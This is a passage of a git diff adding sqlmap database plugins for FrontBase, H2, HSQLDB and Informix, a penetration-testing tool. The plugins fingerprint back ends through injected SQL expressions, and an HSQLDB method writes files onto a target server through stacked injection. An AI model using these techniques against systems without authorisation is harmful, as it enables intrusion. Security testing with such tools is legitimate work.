+ + return expression diff --git a/plugins/dbms/frontbase/takeover.py b/plugins/dbms/frontbase/takeover.py new file mode 100644 index 00000000000..bc7787c6109 --- /dev/null +++ b/plugins/dbms/frontbase/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on FrontBase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on FrontBase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on FrontBase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on FrontBase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/__init__.py b/plugins/dbms/h2/__init__.py new file mode 100644 index 00000000000..fbefae0055a --- /dev/null +++ b/plugins/dbms/h2/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import H2_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.h2.enumeration import Enumeration +from plugins.dbms.h2.filesystem import Filesystem +from plugins.dbms.h2.fingerprint import Fingerprint +from plugins.dbms.h2.syntax import Syntax +from plugins.dbms.h2.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class H2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines H2 methods + """ + + def __init__(self): + self.excludeDbsList = H2_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.H2] = Syntax.escape diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py new file mode 100644 index 00000000000..ec625e31f8b --- /dev/null +++ b/plugins/dbms/h2/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on H2 it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py new file mode 100644 index 00000000000..9dc1131d329 --- /dev/null +++ b/plugins/dbms/h2/enumeration.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import DBMS +from lib.core.settings import H2_DEFAULT_SCHEMA +from lib.request import inject +from plugins.generic.enumeration 
import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + if not conf.getBanner: + return + + if kb.data.banner is None: + infoMsg = "fetching banner" + logger.info(infoMsg) + + query = queries[DBMS.H2].banner.query + kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) + + return kb.data.banner + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on H2 it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getCurrentDb(self): + return H2_DEFAULT_SCHEMA + + def getPasswordHashes(self): + warnMsg = "on H2 it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on H2 it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py new file mode 100644 index 00000000000..f607dc2438c --- /dev/null +++ b/plugins/dbms/h2/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on H2 it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on H2 it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py new file mode 100644 index 00000000000..7125b27cec3 --- /dev/null +++ b/plugins/dbms/h2/fingerprint.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS +from lib.core.session import setDbms +from lib.core.settings import H2_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.H2) + + def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("EXISTS(SELECT * FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME='IGNITE')"): + fork = FORK.IGNITE + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.H2 + if fork: + value += " (%s fork)" % fork + return value + + actVer = Format.getDbms() + blank = " " * 15 + value 
+= "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES): + setDbms("%s %s" % (DBMS.H2, Backend.getVersion())) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.H2 + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ZERO()=0") + + if result: + infoMsg = "confirming %s" % DBMS.H2 + logger.info(infoMsg) + + result = inject.checkBooleanExpression("LEAST(ROUNDMAGIC(PI()),3)=3") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warning(warnMsg) + + return False + else: + setDbms(DBMS.H2) + + result = inject.checkBooleanExpression("JSON_OBJECT() IS NOT NULL") + version = '2' if result else '1' + Backend.setVersion(version) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warning(warnMsg) + + return False + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/h2/syntax.py b/plugins/dbms/h2/syntax.py new file mode 100644 index 00000000000..cfc1c86a8ca --- /dev/null +++ b/plugins/dbms/h2/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/h2/takeover.py b/plugins/dbms/h2/takeover.py new file mode 100644 index 00000000000..29ba323a57c --- /dev/null +++ b/plugins/dbms/h2/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py new file mode 100644 index 00000000000..9a667f25a38 --- /dev/null +++ b/plugins/dbms/hsqldb/__init__.py @@ -0,0 +1,29 @@ 
+#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import HSQLDB_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.hsqldb.enumeration import Enumeration +from plugins.dbms.hsqldb.filesystem import Filesystem +from plugins.dbms.hsqldb.fingerprint import Fingerprint +from plugins.dbms.hsqldb.syntax import Syntax +from plugins.dbms.hsqldb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class HSQLDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines HSQLDB methods + """ + + def __init__(self): + self.excludeDbsList = HSQLDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.HSQLDB] = Syntax.escape diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py new file mode 100644 index 00000000000..429337d20bd --- /dev/null +++ b/plugins/dbms/hsqldb/connector.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import jaydebeapi + import jpype +except: + pass + +import logging + +from lib.core.common import checkFile +from lib.core.common import getSafeExString +from lib.core.common import readInput +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ + User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html + API: - + Debian package: - + License: LGPL & Apache License 2.0 + """ + + def connect(self): + self.initConnection() + try: + msg = "please enter the location of 'hsqldb.jar'? " + jar = readInput(msg) + checkFile(jar) + args = "-Djava.class.path=%s" % jar + jvm_path = jpype.getDefaultJVMPath() + jpype.startJVM(jvm_path, args) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + try: + driver = 'org.hsqldb.jdbc.JDBCDriver' + connection_string = 'jdbc:hsqldb:mem:.' 
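            # the in-memory URL above ('jdbc:hsqldb:mem:.') opens a throwaway local
            # database inside the JVM started via jpype; the commented-out form on the
            # next line is the client/server variant built from self.hostname and self.db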
# 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) + self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + upper_query = query.upper() + + if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): + query = "VALUES %s" % query + + if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query: + query = "%s FROM (VALUES(0))" % query + + self.cursor.execute(query) + retVal = self.cursor.fetchall() + + return retVal diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py new file mode 100644 index 00000000000..a45484c4571 --- /dev/null +++ b/plugins/dbms/hsqldb/enumeration.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import DBMS +from lib.core.settings import HSQLDB_DEFAULT_SCHEMA +from lib.request import inject +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + if not conf.getBanner: + return + + if kb.data.banner is None: + infoMsg = "fetching banner" + logger.info(infoMsg) + + query = queries[DBMS.HSQLDB].banner.query + kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) + + return kb.data.banner + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on HSQLDB it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on HSQLDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getCurrentDb(self): + return HSQLDB_DEFAULT_SCHEMA + + def getStatements(self): + warnMsg = "on HSQLDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py new file mode 100644 index 00000000000..d5e78548412 --- /dev/null +++ b/plugins/dbms/hsqldb/filesystem.py @@ -0,0 +1,60 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import randomStr +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import PLACE +from lib.request import inject +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on HSQLDB it is not possible to 
read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + @stackedmethod + def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + func_name = randomStr() + max_bytes = 1024 * 1024 + + debugMsg = "creating JLP procedure '%s'" % func_name + logger.debug(debugMsg) + + addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (func_name, max_bytes) + addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL " + addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'" + inject.goStacked(addFuncQuery) + + fcEncodedList = self.fileEncode(localFile, "hex", True) + fcEncodedStr = fcEncodedList[0][2:] + fcEncodedStrLen = len(fcEncodedStr) + + if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: + warnMsg = "as the injection is on a GET parameter and the file " + warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen + warnMsg += "bytes, this might cause errors in the file " + warnMsg += "writing process" + logger.warning(warnMsg) + + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) + logger.debug(debugMsg) + + # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures + invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (func_name, remoteFile, fcEncodedStr, max_bytes) + inject.goStacked(invokeQuery) + + logger.debug("cleaning up the database management system") + + delQuery = "DELETE PROCEDURE %s" % func_name + inject.goStacked(delQuery) + + message = "the local file '%s' has been written on the back-end DBMS" % localFile + message += "file system ('%s')" % remoteFile + logger.info(message) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py new file mode 100644 index 00000000000..b58faee05da --- /dev/null +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -0,0 +1,153 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import HSQLDB_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.HSQLDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp and not conf.api: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp and not conf.api: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + actVer = Format.getDbms() + + if not conf.extensiveFp: + value += actVer + return value + + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + if re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" + + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + 
return value + + def checkDbms(self): + """ + References for fingerprint: + DATABASE_VERSION() + version 2.2.6 added two-arg REPLACE function REPLACE('a','a') compared to REPLACE('a','a','d') + version 2.2.5 added SYSTIMESTAMP function + version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions + version 2.2.0 added support for ROWNUM() function + version 2.1.0 added MEDIAN aggregate function + version < 2.0.1 added support for datetime ROUND and TRUNC functions + version 2.0.0 added VALUES support + version 1.8.0.4 Added org.hsqldbdb.Library function, getDatabaseFullProductVersion to return the + full version string, including the 4th digit (e.g. 1.8.0.4). + version 1.7.2 CASE statements added and INFORMATION_SCHEMA + + """ + + if not conf.extensiveFp and Backend.isDbmsWithin(HSQLDB_ALIASES): + setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion())) + + if Backend.isVersionGreaterOrEqualThan("1.7.2"): + kb.data.has_information_schema = True + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.HSQLDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("CASEWHEN(1=1,1,0)=1") + + if result: + infoMsg = "confirming %s" % DBMS.HSQLDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("LEAST(ROUNDMAGIC(PI()),3)=3") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warning(warnMsg) + + return False + else: + result = inject.checkBooleanExpression("ZERO() IS 0") # Note: check for H2 DBMS (sharing majority of same functions) + if result: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warning(warnMsg) + + return False + + kb.data.has_information_schema = True + Backend.setVersion(">= 1.7.2") + setDbms("%s 1.7.2" % DBMS.HSQLDB) + + banner = self.getBanner() + if banner: + Backend.setVersion("= %s" % banner) + else: + if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): + Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) + else: + banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) + if banner: + Backend.setVersion("= %s" % banner) + else: + Backend.setVersionList([">= 1.7.2", "< 1.8.0"]) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warning(warnMsg) + + dbgMsg = "...or version is < 1.7.2" + logger.debug(dbgMsg) + + return False + + def getHostname(self): + warnMsg = "on HSQLDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def checkDbmsOs(self, detailed=False): + if Backend.getOs(): + infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() + logger.info(infoMsg) + else: + self.userChooseDbmsOs() diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py new file mode 100644 index 00000000000..cfc1c86a8ca --- /dev/null +++ b/plugins/dbms/hsqldb/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return
Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py new file mode 100644 index 00000000000..f364bdf54d2 --- /dev/null +++ b/plugins/dbms/hsqldb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on HSQLDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on HSQLDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on HSQLDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on HSQLDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/informix/__init__.py b/plugins/dbms/informix/__init__.py new file mode 100644 index 00000000000..8cb00583fbe --- /dev/null +++ b/plugins/dbms/informix/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import INFORMIX_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.informix.enumeration import Enumeration +from plugins.dbms.informix.filesystem import Filesystem +from plugins.dbms.informix.fingerprint import Fingerprint +from plugins.dbms.informix.syntax import Syntax +from plugins.dbms.informix.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Informix methods + """ + + def __init__(self): + self.excludeDbsList = INFORMIX_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.INFORMIX] = Syntax.escape diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py new file mode 100644 index 00000000000..e6f05889c0f --- /dev/null +++ b/plugins/dbms/informix/connector.py @@ -0,0 +1,60 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import ibm_db_dbi +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ + License: Apache License 2.0 + """ + + def connect(self): + self.initConnection() + + try: + database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) + self.connector = ibm_db_dbi.connect(database, self.user, self.password) + except ibm_db_dbi.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + 
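        # the DSN passed to ibm_db_dbi.connect() above uses the standard DB2/Informix
        # keyword=value form (DATABASE/HOSTNAME/PORT/PROTOCOL); the user name and
        # password are supplied as separate positional arguments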
self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except ibm_db_dbi.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except ibm_db_dbi.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/informix/enumeration.py b/plugins/dbms/informix/enumeration.py new file mode 100644 index 00000000000..c67bdf71368 --- /dev/null +++ b/plugins/dbms/informix/enumeration.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def searchDb(self): + warnMsg = "on Informix searching of databases is not implemented" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Informix searching of tables is not implemented" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Informix searching of columns is not implemented" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Informix search option is not available" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Informix it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/informix/filesystem.py b/plugins/dbms/informix/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/informix/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py new file mode 100644 index 00000000000..f71e6deff80 --- /dev/null +++ b/plugins/dbms/informix/fingerprint.py @@ -0,0 +1,111 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import INFORMIX_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.INFORMIX) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.INFORMIX + 
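            # when an extensive fingerprint was not requested (conf.extensiveFp is not
            # set) the report stops at the bare DBMS name and the detailed
            # active/banner/error fingerprinting below is skipped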
